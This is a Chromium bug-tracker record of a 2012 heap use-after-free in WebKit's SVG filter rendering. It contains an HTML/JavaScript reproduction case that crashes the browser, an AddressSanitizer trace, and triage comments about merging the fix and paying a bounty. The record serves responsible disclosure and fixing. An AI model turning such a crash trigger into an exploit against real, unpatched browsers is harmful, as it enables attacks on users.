Issue metadata

Status: Fixed
Closed: Dec 2012
Pri: 1
Type: Bug-Security

Issue 156567: Security: use-after-free in WebCore::GraphicsContext::paintingDisabled

Reported by miau...@gmail.com, Oct 18 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::paintingDisabled

VERSION
Chrome Version: dev

Chromium: 24.0.1301.0 (Developer Build 162597)
OS: Linux
WebKit: 537.16 (@131643)
JavaScript: V8 3.14.4.1

Causes infinite recursion in older versions (prior to the other SVG bugfix).

Operating System: 64bit ubuntu precise

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'g')
        el1.setAttribute('filter', 'url(#el2)')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)
        el3=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        el2.appendChild(el3)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el2)')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==7986== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb2beec at pc 0x55555a030bba bp 0x7fffffff4780 sp 0x7fffffff4778
READ of size 1 at 0x7fffebb2beec thread T0
    #0 0x55555a030bb9 in WebCore::GraphicsContext::paintingDisabled() const ???:0
    #1 0x55555a0abaf2 in WebCore::GraphicsContext::concatCTM(WebCore::AffineTransform const&) ???:0
    #2 0x55555c30a2f9 in WebCore::RenderSVGResourceFilter::postApplyResource(WebCore::RenderObject*, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) ???:0

0x7fffebb2beec is located 108 bytes inside of 144-byte region [0x7fffebb2be80,0x7fffebb2bf10)
freed by thread T0 here:
    #0 0x55555f967df0 in __interceptor_free ??:0
    #1 0x55555a0b2a95 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555c307e20 in WebCore::RenderSVGResourceFilter::applyResource(WebCore::RenderObject*, WebCore::RenderStyle*, WebCore::GraphicsContext*&, unsigned short) ???:0
    #3 0x55555c04d9dc in WebCore::SVGRenderingContext::prepareToRenderSVGContent(WebCore::RenderObject*, WebCore::PaintInfo&, WebCore::SVGRenderingContext::NeedsGraphicsContextSave) ???:0

Attachments: svg3.html (826 bytes), svg3.txt (19.3 KB)

Comment 1 by infe...@chromium.org, Oct 18 2012

Cc: pdr@chromium.org fmalita@chromium.org
Labels: WebKit-SVG
Owner: schenney@chromium.org

Comment 2 by infe...@chromium.org, Oct 18 2012

Status: Assigned

Comment 3 by schenney@chromium.org, Oct 22 2012

Labels: WebKit-ID-94652

Comment 4 by schenney@chromium.org, Oct 30 2012

Labels: Merge-Requested
Apparently BugDroid failed to pick up that this was fixed in WebKit r132856: <http://trac.webkit.org/changeset/132856>.

Merge requested for m23. Reward?

Comment 5 by schenney@chromium.org, Oct 30 2012

Status: FixUnreleased

Comment 6 by infe...@chromium.org, Oct 30 2012

Labels: -Pri-0 -Area-Undefined -Merge-Requested Pri-1 Area-WebKit Merge-Approved reward-topanel Mstone-23 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
I don't think it will make it to m23 stable (needs bake time on trunk), but m23 stable first patch.

Comment 7 by scarybea...@gmail.com, Oct 30 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify SecSeverity-High

Comment 8 by schenney@chromium.org, Oct 30 2012

Sorry, I interpret Abhishek's comment to mean don't merge, but the MergeApproved flag is set. Please clarify. :-)

And the Chromium Notifier just IMed me, also apparently upset.

Comment 9 by kareng@google.com, Oct 30 2012

Labels: -Merge-Approved Merge-Requested
Please don't merge just now. I'm still in the process of getting a good build. If I read Abhishek's comment right, he's saying we'll take it for stable 2. I will give you a heads-up as soon as it's ok to merge. Chris/Abhishek, is that ok?

(Setting back to requested so I don't lose it.)

Comment 10 by scarybea...@gmail.com, Oct 30 2012

Hey Karen, generally, "Merge-Approved" still means we'll wait for you to say it's ok. Security merges are tackled pretty much by myself or Abhishek and we do not fire them off indiscriminately :P

Comment 11 by infe...@chromium.org, Oct 30 2012

Labels: -Merge-Requested Merge-Approved
Answer to first question: security bugs have blanket merge approval; we use the flag to keep track of which bugs to merge. But we do the actual merge when the merge window opens (and after letting it bake and checking with the RM).

Answer to second question: ignore that, we need to get that fixed. Known issue.

Overall conclusion: Keep fixing awesome bugs, leave the merges to the security team :)

I have talked to Karen and told her that we are not merging this to the branch right now, but for the next m23 patch.

Comment 12 by scarybea...@gmail.com, Nov 12 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000 for miaubiz!

Comment 13 by scarybea...@gmail.com, Nov 12 2012

Labels: -Merge-Approved Merge-Merged
M23: http://trac.webkit.org/changeset/134258

Comment 16 by scarybea...@gmail.com, Dec 14 2012

Labels: -reward-unpaid
Payment in system as part of $3000 batch.

Comment 17 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-23 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 19 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 23 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 24 by bugdroid1@chromium.org, Apr 5 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 30 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic